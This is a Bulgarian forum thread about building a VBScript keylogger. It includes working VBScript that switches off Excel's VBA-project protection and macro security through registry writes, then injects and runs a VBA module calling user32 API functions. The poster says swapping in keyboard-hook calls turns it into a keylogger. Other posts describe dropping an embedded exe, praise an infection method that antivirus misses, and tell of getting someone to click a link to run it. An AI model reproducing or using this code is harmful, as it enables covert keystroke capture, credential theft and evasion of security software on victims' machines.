VBScript Script keylogger
| Автор |
|
| anonymousПон, 09.08.10, 11:30 | RE: RE: VBScript Script keylogger
” Преди време в дискусията стана въпрос за необходимост от регистрирана DLL, за да се ползва API функцията за прихващане на клавиши. Това е вярно, ако искаме да ползваме директно тази функция. Но ако направим exe файл ( с необходимите ни функции ) и вградим бинарния код на exe-то в скрипта, остава само скрипта да запише наново exe-то (в произволна директория) и да го стартира. Елементарно и всичко само в две стъпки, а exe файла работи перфектно с библиотеките на Windows без никаква инсталация. Ето и примерче за любознателните, но не за търговците.  Klavish.vbs „
dreven ти не казваше ли за библиотека във вин която може да се извика само с vbscript без админски права... не с външни програми или зависими от Excel... П.С. kookki в тази тема както виждаш никой по никакъв начин не разкрива "същността" тук се дават идеите... в http://secrets-bg.com се демонстрира една мъничка част от идеи... пълните версии са платени и такива хора като Iliqn82 могат само да рекламират сайта без никой да им помага... и в двете места може да се каже че "идеите" са защитени... | | | anonymousВто, 10.08.10, 00:35 | RE: VBScript Script keylogger
” За да върна темата към програмирането, сглобих едно примерче, как чрез VBS при наличен ОФИС в комбинация с VBA се задейства API функция. Примерът сваля защита на Excel за работа с външни модули, създава такъв модул и го стартира, като премества мишката на определени кординати и клика. Във вида който го давам примерът е безобиден, но ако се сменят API функциите с тези, които съм дал в по-горния пример, ще се получи така наречения Keyloger. Tази операция ще бъде по-силите на ограничен брой читатели на форума и се надявам те да не злоупотребяват. Примерът съм го пробвал на XP с Excel 2003, ако не тръгне с друг Офис значи трябва да се пипне по ключа в регистрите, но тук от значение е повече идеята. On Error Resume Next
'Сваляне на защита на Excel, чрез промяна на ключ в регистрите
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Const HKEY_CURRENT_USER = &H80000001
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_
strComputer & "rootdefault:StdRegProv")
'Създаване на ключ
strKeyPath = "SoftwareMicrosoftOffice11.0ExcelSecurity"
oReg.CreateKey HKEY_CURRENT_USER,strKeyPath
'Създаване на променлива Dword
strValueName = "AccessVBOM"
dwValue =1
oReg.SetDWORDValue HKEY_CURRENT_USER,strKeyPath,strValueName,dwValue
'Създаване на променлива Dword
strValueName = "Level"
dwValue = 1
oReg.SetDWORDValue HKEY_CURRENT_USER,strKeyPath,strValueName,dwValue
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Стартиране на беззащитния Excel и добавяне на модул с АPI функция''''''''''''''''''
' за преместване на мишката на кординати 30,30 и кликане'''''''''''''''''''''''''''''
Dim ExcelApp : Set ExcelApp = CreateObject("Excel.Application")
'ExcelApp.Visible = false
Dim ExcelAppWBk : Set ExcelAppWBk = ExcelApp.Workbooks.Add
Dim ExcelAppMod : Set ExcelAppMod = ExcelAppWBk.VBProject.VBComponents.Add(1)
ExcelAppMod.CodeModule.AddFromString "Private Declare Function SetCursorPos Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal x As Long, ByVal y As Long) As Long" & _
VBCrLf & "Private Declare Sub mouse_event Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)" & _
VBCrLf & "Private Const MOUSEEVENTF_LEFTDOWN =" & Chr(38) & "H2" &_
VBCrLf & "Private Const MOUSEEVENTF_LEFTUP =" & Chr(38) & "H4" &_
VBCrLf & "Public Function SetCursorPosition(xPos as Long, yPos as Long, lClick)" &_
VBCrLf & "SetCursorPos xPos, yPos" &_
VBCrLf & "If lClick = 1 then" &_
VBCrLf & "mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0" &_
VBCrLf & "mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0" &_
VBCrLf & "End if" &_
VBCrLf & "End Function"
ExcelApp.Run "SetCursorPosition(30,30,1)"
ExcelAppWBk.Close False
ExcelApp.Quit
WScript.Quit |
„ Така вече работи...
---------------------------------------------------------------------------------------------- On Error Resume Next
'Сваляне на защита на Excel, чрез промяна на ключ в регистрите
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\AccessVBOM","1","REG_DWORD"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Стартиране на беззащитния Excel и добавяне на модул с АPI функция''''''''''''''''''
' за преместване на мишката на кординати 30,30 и кликане'''''''''''''''''''''''''''''
Dim ExcelApp : Set ExcelApp = CreateObject("Excel.Application")
'ExcelApp.Visible = false
Dim ExcelAppWBk : Set ExcelAppWBk = ExcelApp.Workbooks.Add
Dim ExcelAppMod : Set ExcelAppMod = ExcelAppWBk.VBProject.VBComponents.Add(1)
ExcelAppMod.CodeModule.AddFromString "Private Declare Function SetCursorPos Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal x As Long, ByVal y As Long) As Long" & _
VBCrLf & "Private Declare Sub mouse_event Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)" & _
VBCrLf & "Private Const MOUSEEVENTF_LEFTDOWN =" & Chr(38) & "H2" &_
VBCrLf & "Private Const MOUSEEVENTF_LEFTUP =" & Chr(38) & "H4" &_
VBCrLf & "Public Function SetCursorPosition(xPos as Long, yPos as Long, lClick)" &_
VBCrLf & "SetCursorPos xPos, yPos" &_
VBCrLf & "If lClick = 1 then" &_
VBCrLf & "mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0" &_
VBCrLf & "mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0" &_
VBCrLf & "End if" &_
VBCrLf & "End Function"
ExcelApp.Run "SetCursorPosition(30,30,1)"
ExcelAppWBk.Close False
ExcelApp.Quit
WScript.Quit ----------------------------------------------------------------------------------------------
За слагане на защитата...
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\AccessVBOM","0","REG_DWORD" редактиран от anonymous на 10.08.10 00:37 | | | anonymousПет, 03.09.10, 19:55 | RE: VBScript Script keylogger
” ....ПС: Сериозно те съветвам да четеш уеб-лога на антивирусните компании. Аз нямам много време да го правя, но с удоволствие надниквам в blog-оговете на F-Secure. А пък ей тая "зараза" през FTP я пробвах и си бичи мега айлашката през WinXPSP2 с NOD32 (3 и 4, за 5 не знам) http://www.f-secure.com/weblog/archives/00001738.htmlСупер просто и супер хитро :). И няма засичане от антивирус, поне не се сещам как ще стане ако сменяш сърварите и променливите. „ А ето и тунинг версията хех | | | phrozencrewПет, 03.09.10, 20:45 | RE: RE: VBScript Script keylogger
Хехехеее! Бравос!  Това мога да го използвам за доста полезни неща, особено на компютри, които аз съм преинсталирал! Само му казвам на оня човечец отсреща - отвори си D:\install (обикновенно правя подобна папка с необходимия софт) и накликай ей тоя линк и после си трай! Супер е! | | | танясексСъб, 04.09.10, 22:03 |
Еди, чудно ми е ако си инсталирам ТОВА ,дали ще ме лови това чудо  | | | anonymousСъб, 04.09.10, 22:15 | RE: VBScript Script keylogger
” Еди, чудно ми е ако си инсталирам ТОВА ,дали ще ме лови това чудо „ Всичко е до проба.... | | | tegoteНед, 05.09.10, 00:00 |
Уфффффффф.................. Абе по-интересно е да гледаш клипчета как се краква програма!!!!! ТОВА е интересно! Шашмите и вредите не са от полза никому. Но да станеш факир да присвоиш програма - ето това вече е като да качиш върха на планината. Занимавате се с безполезни неща. Аз например искам да видя как аджеба се кракват инсталаторите и стават RETAIL. Знам един кракер, който постоянно подправя инсталаторите, без да има за това програмата. Разбира се, работата му е да подправи и някой файл, винаги ми е било чудно къде чопли и какво намира. Любопитството ми да наблюдавам триковете на проникване в дадена защита на програмата е по-голямо, отколкото да гледам най-интересният игрален филм. Така че Еди няма да е лошо да погледне накъде може да духа вятъра. Защото никой не чете от любознателност. При вас като програмисти е нормално да прокарвате идеи за реализация на знанията и наученото, но това ще е интересно само за знаещите. Тези, които не са учили няма и да погледнат какво правите. | | | stoqnchoПет, 24.09.10, 09:35 |
Става дума за това VBA Кейлогър. Хубаво може да не е в база данните на Kaspersky ама пак разбра, че е Keylogger. Просто реших да пробвам дали ще го засече по някакъв начин и му засече поведението, че прилича на Keylogger след, като беше пуснат, а не след сканиране! Лошооо.... :(
| | | anonymousПет, 24.09.10, 09:49 | RE: VBScript Script keylogger
” Става дума за това VBA Кейлогър. Хубаво може да не е в база данните на Kaspersky ама пак разбра, че е Keylogger. Просто реших да пробвам дали ще го засече по някакъв начин и му засече поведението, че прилича на Keylogger след, като беше пуснат, а не след сканиране! Лошооо.... :(
„ Е нали смисъла е в това да не се използва за злонамерена цел за това и касперски само предупреждава че е пусната такава програма... | | | кака.лараПет, 24.09.10, 10:36 | RE: VBScript Script keylogger
” Става дума за това VBA Кейлогър. Хубаво може да не е в база данните на Kaspersky ама пак разбра, че е Keylogger. Просто реших да пробвам дали ще го засече по някакъв начин и му засече поведението, че прилича на Keylogger след, като беше пуснат, а не след сканиране! Лошооо.... :(
„ Е много ясно!
Щом го няма в базата, няма да го хване при сканиране. Освен може нещо да се засече с евристичен скенер. После вече при пускането усеща, че някой прихваща вход/изходния вектор и се обажда. | | | stoqnchoПет, 24.09.10, 15:27 | RE: RE: VBScript Script keylogger
” Е нали смисъла е в това да не се използва за злонамерена цел за това и касперски само предупреждава че е пусната такава програма... „ И за какво друго да се ползва, че нещо не му намирам приложение... P.S. Не ми трябва Keylogger! ” Е много ясно! Щом го няма в базата, няма да го хване при сканиране. Освен може нещо да се засече с евристичен скенер. После вече при пускането усеща, че някой прихваща вход/изходния вектор и се обажда. „ Даде.. и аз това казах. | |  Коментар
|
Отговор
За печат